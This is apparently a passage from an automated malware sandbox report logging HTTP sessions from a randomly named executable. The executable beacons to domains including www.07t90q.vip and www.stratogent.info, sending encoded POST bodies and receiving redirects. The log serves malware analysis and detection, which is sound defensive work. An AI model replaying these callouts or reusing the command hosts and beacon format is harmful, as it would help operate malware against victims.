                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 4c 7a 67 34 52 39 54 57 51 6a 7a 66 44 66 38 49 71 55 63 4f 74 49 71 2b 49 74 36 68 2f 70 45 67 63 66 6c 31 63 30 74 56 43 50 45 39 62 48 75 78 75 6e 61 36 5a 50 45 65 32 65 63 4b 73 71 6b 41 38 46 67 7a 34 67 6f 59 54 6b 61 53 4b 6d 4a 47 32 4c 6c 6c 6d 57 79 71 6e 71 43 59 2b 4e 72 74 76 4b 6e 32 55 32 4b 4e 38 37 41 52 31 39 76 55 75 79 51 5a 4b 4c 33 4f 74 78 4d 35 35 53 66 58 65 53 74 45 47 31 58 58 4d 4d 55 57 4b 49 69 75 59 35 35 4e 2f 62 71 35 63 6b 65 2b 54 48 33 38 4b 54 62 34 56 61 76 57 59 56 45 69 36 6b 6d 64 6d 5a 71 38 79 58 75 36 37 77 6d 53 4c 35 6b 49 59 31 4e 35 51 62 6f 64 6b 75 44 39 38 49 35 41 6c 39 31 38 37 4a 50 6a 73 77 53 41 52 52 64 65 38 42 62 57 44 43 72 4c 2b 72 73 61 69 44 35 78 4e 41 41 52 30 39 56 70 39 49 67 64 51 49 73 73 6d 77 66 54 69 2b 4c 47 43 67 41 35 71 4f 67 4e 45 69 4e 38 5a 78 2f 51 70 49 41 76 34 78 78 59 6c 75 53 63 72 63 78 2f 45 6a 7a 64 61 46 68 6f 50 42 42 30 62 4d 50 75 32 6f 75 6e 41 79 39 78 66 79 77 4b 36 76 71 72 7a 36 5a [TRUNCATED]
                                                                                  Data Ascii: v2x4if=Lzg4R9TWQjzfDf8IqUcOtIq+It6h/pEgcfl1c0tVCPE9bHuxuna6ZPEe2ecKsqkA8Fgz4goYTkaSKmJG2LllmWyqnqCY+NrtvKn2U2KN87AR19vUuyQZKL3OtxM55SfXeStEG1XXMMUWKIiuY55N/bq5cke+TH38KTb4VavWYVEi6kmdmZq8yXu67wmSL5kIY1N5QbodkuD98I5Al9187JPjswSARRde8BbWDCrL+rsaiD5xNAAR09Vp9IgdQIssmwfTi+LGCgA5qOgNEiN8Zx/QpIAv4xxYluScrcx/EjzdaFhoPBB0bMPu2ounAy9xfywK6vqrz6ZbWWZ8Iub41WR06IJfpsZaVgTbcednDyQegrpDmxFyyZrzXtjtNEKj5afQMnTvfHP9dqt4H02nkjuuG7v2hDJBT5/mJOnjtykuj5UGfiePdPV9sy+Jmj1TbYc7ey7ghn1LPZKrhfCnqaUfgmzucTAiSPgh1VEg3WynjdC9RhXxr1bwWhfeRR1HgKS5ckopLujBI+7aNBmIuVxL0235so6mXuS9IpjTKoBzbC+584iEfmJX5MG0USaXNgu5LEZLcbtUSivbSm3BcBuIm3gBNuiQyWxrqrn5qHC0lZUcyRcGEMqPR9Y2gVbvfePGi1v0vP4SYG2cfpVf2deI0QZkNiUnrTqlcFVtVBTabFIp9iGEGP/U3vzj07vunBtjC1GHZCZRwpJPfhIoEhjrY9fko6ODEMOapVSi69MzBDcNaxtlrOor9eb7pWX3mGeZyLFxtVL6ncIZpyqc5DVxKQxgJmv9uvGZo2vRQRykXi/sB059knu77lrPOmpCfAOEPGAr9F9FYih8WUBnsmgrQmZt78+2tt1qAjmr1X1699F572rt1s7E5L7LDeo0HEk2gzwqZEipHPvt4wPWrmVtJ3C/u1Jial1vG1FsoBkZEG9CpAUnGVR+0zPqEy7M3NkD1zFXejVjd6+WxYyxXcVzgw52yikCcNgO5o1BJYVNX [TRUNCATED]
                                                                                  Oct 7, 2024 15:06:02.094213963 CEST720INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Mon, 07 Oct 2024 13:06:01 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 555
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.549990114.134.188.182801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:03.822546959 CEST545OUTGET /n990/?v2x4if=GxIYSLz2GkLjPqt/rHopn9WrO9y33v8yD5l3ZEVwbM0FZ2j7mw+4XotPwvAai7FT8Vl9/yJfFwWFKgVG3tpm2nD6ueTLwdPoo/Wta03Cu/cEpPnD/hpbWd7xqCAhgBSZNQ==&bTU8=BDEpwP48zFO0YTL HTTP/1.1
                                                                                  Host: www.cctv9.rest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Oct 7, 2024 15:06:04.766542912 CEST720INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Mon, 07 Oct 2024 13:06:04 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 555
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.5499913.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:09.811918020 CEST789OUTPOST /cyr7/ HTTP/1.1
                                                                                  Host: www.07t90q.vip
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.07t90q.vip
                                                                                  Referer: http://www.07t90q.vip/cyr7/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 207
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 59 68 51 39 36 59 2f 37 50 4c 77 47 44 4e 72 4d 56 71 71 53 62 51 79 53 55 2b 54 67 49 79 38 76 35 51 4b 47 67 53 69 32 42 6c 35 53 68 4d 4b 6a 42 76 48 76 48 37 4e 70 4b 77 54 32 69 63 6a 50 37 55 30 61 69 67 50 53 39 54 42 63 74 45 72 32 4c 37 46 76 66 55 68 38 56 39 36 72 49 49 30 38 2f 50 6b 62 43 75 6a 70 33 74 55 35 32 56 52 54 54 42 77 51 4a 61 6e 4d 65 79 78 69 65 68 32 34 6c 56 52 6c 4d 50 51 77 62 36 30 32 72 71 61 50 47 58 6e 62 48 2f 44 4a 72 37 34 34 58 6b 69 32 79 6a 4e 63 77 4c 50 56 39 53 78 58 6f 44 7a 57 6c 6f 2f 64 4f 71 75 62 62 32 31 57 68 53 6d 56 71 56 46 37 4d 35 4d 3d
                                                                                  Data Ascii: v2x4if=YhQ96Y/7PLwGDNrMVqqSbQySU+TgIy8v5QKGgSi2Bl5ShMKjBvHvH7NpKwT2icjP7U0aigPS9TBctEr2L7FvfUh8V96rII08/PkbCujp3tU52VRTTBwQJanMeyxieh24lVRlMPQwb602rqaPGXnbH/DJr744Xki2yjNcwLPV9SxXoDzWlo/dOqubb21WhSmVqVF7M5M=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.5499923.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:12.363375902 CEST809OUTPOST /cyr7/ HTTP/1.1
                                                                                  Host: www.07t90q.vip
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.07t90q.vip
                                                                                  Referer: http://www.07t90q.vip/cyr7/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 227
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 59 68 51 39 36 59 2f 37 50 4c 77 47 43 6f 6a 4d 58 4c 71 53 54 51 79 52 49 75 54 67 47 53 38 6a 35 51 47 47 67 54 32 63 41 58 64 53 69 74 36 6a 54 61 7a 76 4c 62 4e 70 43 51 54 7a 74 38 6a 49 37 54 38 6f 69 69 4c 53 39 54 6c 63 74 47 6a 32 4b 49 39 75 4e 30 68 70 5a 64 36 70 47 6f 30 38 2f 50 6b 62 43 71 4b 4d 33 74 38 35 31 6c 42 54 56 6c 45 58 58 71 6e 50 5a 79 78 69 56 42 32 6a 6c 56 52 48 4d 4c 5a 64 62 35 63 32 72 75 65 50 46 44 7a 55 51 76 44 50 6d 62 35 38 47 55 48 43 30 79 39 42 74 72 65 69 71 7a 56 63 74 31 65 38 2f 4b 33 31 64 4b 43 6a 4c 6c 39 68 77 69 48 38 77 32 56 4c 53 75 61 33 50 72 48 73 7a 2f 62 49 6f 57 2b 75 72 2f 70 4e 61 33 32 35
                                                                                  Data Ascii: v2x4if=YhQ96Y/7PLwGCojMXLqSTQyRIuTgGS8j5QGGgT2cAXdSit6jTazvLbNpCQTzt8jI7T8oiiLS9TlctGj2KI9uN0hpZd6pGo08/PkbCqKM3t851lBTVlEXXqnPZyxiVB2jlVRHMLZdb5c2ruePFDzUQvDPmb58GUHC0y9BtreiqzVct1e8/K31dKCjLl9hwiH8w2VLSua3PrHsz/bIoW+ur/pNa325


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.5499933.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:14.904419899 CEST1826OUTPOST /cyr7/ HTTP/1.1
                                                                                  Host: www.07t90q.vip
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.07t90q.vip
                                                                                  Referer: http://www.07t90q.vip/cyr7/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1243
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 59 68 51 39 36 59 2f 37 50 4c 77 47 43 6f 6a 4d 58 4c 71 53 54 51 79 52 49 75 54 67 47 53 38 6a 35 51 47 47 67 54 32 63 41 58 56 53 69 66 79 6a 43 4a 72 76 4b 62 4e 70 49 77 54 79 74 38 69 55 37 56 56 6a 69 69 58 43 39 56 68 63 75 6a 76 32 44 5a 39 75 55 45 68 70 52 39 36 6f 49 49 31 6d 2f 4c 4a 54 43 75 75 4d 33 74 38 35 31 67 4e 54 56 78 77 58 56 71 6e 4d 65 79 78 55 65 68 33 4d 6c 56 70 39 4d 4c 55 67 62 49 38 32 73 4b 36 50 56 67 4c 55 50 66 44 4e 71 37 35 61 47 55 37 64 30 79 68 4e 74 71 61 49 71 77 46 63 73 55 7a 45 6f 6f 2f 53 47 71 76 42 47 47 68 79 6c 30 62 4e 76 42 35 42 65 76 79 6c 54 6f 54 54 30 37 72 59 36 6d 37 43 2f 5a 64 58 54 67 7a 72 77 48 62 31 63 7a 4b 47 39 33 55 50 32 34 43 4b 6f 44 6a 76 58 6e 74 73 6d 6d 35 76 42 44 36 38 6c 38 73 31 44 45 52 2f 36 69 65 46 62 72 36 62 2f 6e 68 75 49 33 59 78 57 32 6e 45 45 68 64 35 6e 43 2b 66 66 66 75 78 58 70 30 6d 45 4b 34 43 2f 6e 47 47 42 49 4a 6d 73 39 70 52 64 70 55 37 48 77 54 55 41 2b 7a 45 67 38 71 4a 2b 33 44 [TRUNCATED]
                                                                                  Data Ascii: v2x4if=YhQ96Y/7PLwGCojMXLqSTQyRIuTgGS8j5QGGgT2cAXVSifyjCJrvKbNpIwTyt8iU7VVjiiXC9Vhcujv2DZ9uUEhpR96oII1m/LJTCuuM3t851gNTVxwXVqnMeyxUeh3MlVp9MLUgbI82sK6PVgLUPfDNq75aGU7d0yhNtqaIqwFcsUzEoo/SGqvBGGhyl0bNvB5BevylToTT07rY6m7C/ZdXTgzrwHb1czKG93UP24CKoDjvXntsmm5vBD68l8s1DER/6ieFbr6b/nhuI3YxW2nEEhd5nC+fffuxXp0mEK4C/nGGBIJms9pRdpU7HwTUA+zEg8qJ+3DF68Hh8mMeebt1hBh0ry1vLJVz/KHYVTp5z3SsEtiIyJnRx4UzdtjStBIpXa0F9o0iEqSfP37xl+pC7AJlXUwLZUK/gIKkAtggaYmSuBQTtvJ6tRlZ1MY9pWmRArfm8cwtj7OHxqdA0rME/8yonR5C9jL5pnd0aqtdIBgvOGga+i/9JVhQAJ2z+itqnbm8KQ07RkmiFkqPngmzY7AYlCehJI6fHhZdeSglDm8byottbWiI81HO5Ue1xqI+Va30lm/m8ofY3kBM9ZFo/4XoUBB/zUhSLqYSqLe/blATBbyi3xuQAxAHm7+EEAeUFa7r37H7TAR+lV0dxtsVZTeXFmwwXPqoaiGoBR/r6A5HJ707vB08/UAkvZgtd/Oz4Fbcbw15aOE/kjSFO80ys2iHDCZI899eCrEfz2qcMDjYAJf1rfhBVCt02QrJ8waUfp4bT5XnjZBsKzGMuSMgk1i3WjVw9vh8WEkpDrV7cnluxUz7nD7bnnet/MrCGaV0oqFtzZYZLqT416pLxcuihmBtdNgR878i8zUkeJDFmkqpzmwx0nV72I+NykWGaj2hmo6KUcr0Xye7myMFf2GuTS5F4X+Fl2BQvMglU7pDI1S9ExD2K4JFSpo+CATOtdPuPvGQh1QNp8gFxHDylcE6LTkT60q43S4QWpewKDojm [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.5499943.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:17.463680983 CEST545OUTGET /cyr7/?v2x4if=Vj4d5vaEXsFuB8fEcLmrU2eSD43jNQA/5S+cpwa+Zl1KtdnsFYOpBvNJOVDgu9PAnTJmhhfW0UddtTnseo1uNxsgVMS/H7YloLAZNbDtj8sD0y9kdjlRL77hQz9vNymozA==&bTU8=BDEpwP48zFO0YTL HTTP/1.1
                                                                                  Host: www.07t90q.vip
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Oct 7, 2024 15:06:18.125291109 CEST415INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Mon, 07 Oct 2024 13:06:18 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 32 78 34 69 66 3d 56 6a 34 64 35 76 61 45 58 73 46 75 42 38 66 45 63 4c 6d 72 55 32 65 53 44 34 33 6a 4e 51 41 2f 35 53 2b 63 70 77 61 2b 5a 6c 31 4b 74 64 6e 73 46 59 4f 70 42 76 4e 4a 4f 56 44 67 75 39 50 41 6e 54 4a 6d 68 68 66 57 30 55 64 64 74 54 6e 73 65 6f 31 75 4e 78 73 67 56 4d 53 2f 48 37 59 6c 6f 4c 41 5a 4e 62 44 74 6a 38 73 44 30 79 39 6b 64 6a 6c 52 4c 37 37 68 51 7a 39 76 4e 79 6d 6f 7a 41 3d 3d 26 62 54 55 38 3d 42 44 45 70 77 50 34 38 7a 46 4f 30 59 54 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?v2x4if=Vj4d5vaEXsFuB8fEcLmrU2eSD43jNQA/5S+cpwa+Zl1KtdnsFYOpBvNJOVDgu9PAnTJmhhfW0UddtTnseo1uNxsgVMS/H7YloLAZNbDtj8sD0y9kdjlRL77hQz9vNymozA==&bTU8=BDEpwP48zFO0YTL"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.54999576.223.105.230801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:23.183681011 CEST804OUTPOST /1c49/ HTTP/1.1
                                                                                  Host: www.stratogent.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.stratogent.info
                                                                                  Referer: http://www.stratogent.info/1c49/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 207
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 62 65 4d 6e 38 6c 4b 71 4d 52 6f 78 6e 6e 54 67 46 72 78 68 78 45 62 66 32 34 68 70 4f 2f 50 79 78 70 6e 32 57 4d 6f 49 77 7a 47 72 42 30 37 43 4f 4c 46 41 35 34 52 52 69 43 67 65 65 36 63 72 6a 34 39 37 30 77 69 32 57 65 48 69 33 30 71 41 57 30 2f 69 33 67 57 36 43 6a 4e 6e 31 6a 42 56 6a 48 4c 41 41 6c 4d 71 64 4b 2f 45 38 62 39 6b 4b 48 6d 49 68 30 76 48 59 6e 6e 59 38 79 63 59 4c 75 69 67 79 67 30 2f 4d 64 32 41 48 7a 64 2f 37 72 74 45 38 65 68 6b 57 35 2f 73 47 63 56 41 79 6d 7a 2b 46 6d 36 72 63 32 45 77 65 50 4f 6d 41 36 59 36 49 32 4f 74 6e 63 62 78 48 42 50 58 35 39 76 69 75 49 49 3d
                                                                                  Data Ascii: v2x4if=beMn8lKqMRoxnnTgFrxhxEbf24hpO/Pyxpn2WMoIwzGrB07COLFA54RRiCgee6crj4970wi2WeHi30qAW0/i3gW6CjNn1jBVjHLAAlMqdK/E8b9kKHmIh0vHYnnY8ycYLuigyg0/Md2AHzd/7rtE8ehkW5/sGcVAymz+Fm6rc2EwePOmA6Y6I2OtncbxHBPX59viuII=
                                                                                  Oct 7, 2024 15:06:23.633363008 CEST325INHTTP/1.1 301 Moved Permanently
                                                                                  location: https://stratogent.info/1c49/
                                                                                  vary: Accept-Encoding
                                                                                  server: DPS/2.0.0+sha-227ca78
                                                                                  x-version: 227ca78
                                                                                  x-siteid: us-east-1
                                                                                  set-cookie: dps_site_id=us-east-1; path=/
                                                                                  date: Mon, 07 Oct 2024 13:06:23 GMT
                                                                                  keep-alive: timeout=5
                                                                                  transfer-encoding: chunked
                                                                                  connection: close
                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.54999676.223.105.230801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:25.870939970 CEST824OUTPOST /1c49/ HTTP/1.1
                                                                                  Host: www.stratogent.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.stratogent.info
                                                                                  Referer: http://www.stratogent.info/1c49/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 227
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 62 65 4d 6e 38 6c 4b 71 4d 52 6f 78 31 57 44 67 48 4d 6c 68 6d 30 62 65 7a 34 68 70 48 66 50 32 78 70 72 32 57 4e 64 44 77 46 2b 72 47 52 58 43 50 50 70 41 30 59 52 52 73 69 68 56 44 71 63 67 6a 34 77 62 30 78 4f 32 57 61 58 69 33 31 61 41 57 44 6a 6a 32 77 57 38 4f 44 4e 6c 6f 54 42 56 6a 48 4c 41 41 6c 70 33 64 4b 33 45 38 49 56 6b 4b 6d 6d 4c 2b 45 76 49 51 48 6e 59 34 79 64 66 4c 75 69 47 79 68 6f 56 4d 62 71 41 48 32 68 2f 36 35 46 48 72 4f 68 69 53 35 2b 4d 4f 4d 49 32 36 48 2f 52 4a 6e 6e 4b 63 47 38 4d 53 5a 6a 4d 61 59 51 53 62 57 69 56 33 50 54 47 57 78 75 2b 6a 65 2f 53 77 66 64 41 39 4b 6c 76 42 72 61 6d 4f 77 39 72 5a 38 34 67 54 62 76 48
                                                                                  Data Ascii: v2x4if=beMn8lKqMRox1WDgHMlhm0bez4hpHfP2xpr2WNdDwF+rGRXCPPpA0YRRsihVDqcgj4wb0xO2WaXi31aAWDjj2wW8ODNloTBVjHLAAlp3dK3E8IVkKmmL+EvIQHnY4ydfLuiGyhoVMbqAH2h/65FHrOhiS5+MOMI26H/RJnnKcG8MSZjMaYQSbWiV3PTGWxu+je/SwfdA9KlvBramOw9rZ84gTbvH
                                                                                  Oct 7, 2024 15:06:26.355840921 CEST325INHTTP/1.1 301 Moved Permanently
                                                                                  location: https://stratogent.info/1c49/
                                                                                  vary: Accept-Encoding
                                                                                  server: DPS/2.0.0+sha-227ca78
                                                                                  x-version: 227ca78
                                                                                  x-siteid: us-east-1
                                                                                  set-cookie: dps_site_id=us-east-1; path=/
                                                                                  date: Mon, 07 Oct 2024 13:06:26 GMT
                                                                                  keep-alive: timeout=5
                                                                                  transfer-encoding: chunked
                                                                                  connection: close
                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.54999776.223.105.230801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:28.419697046 CEST1841OUTPOST /1c49/ HTTP/1.1
                                                                                  Host: www.stratogent.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.stratogent.info
                                                                                  Referer: http://www.stratogent.info/1c49/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1243
                                                                                  Content-Type: application/x-www-form-urlencoded
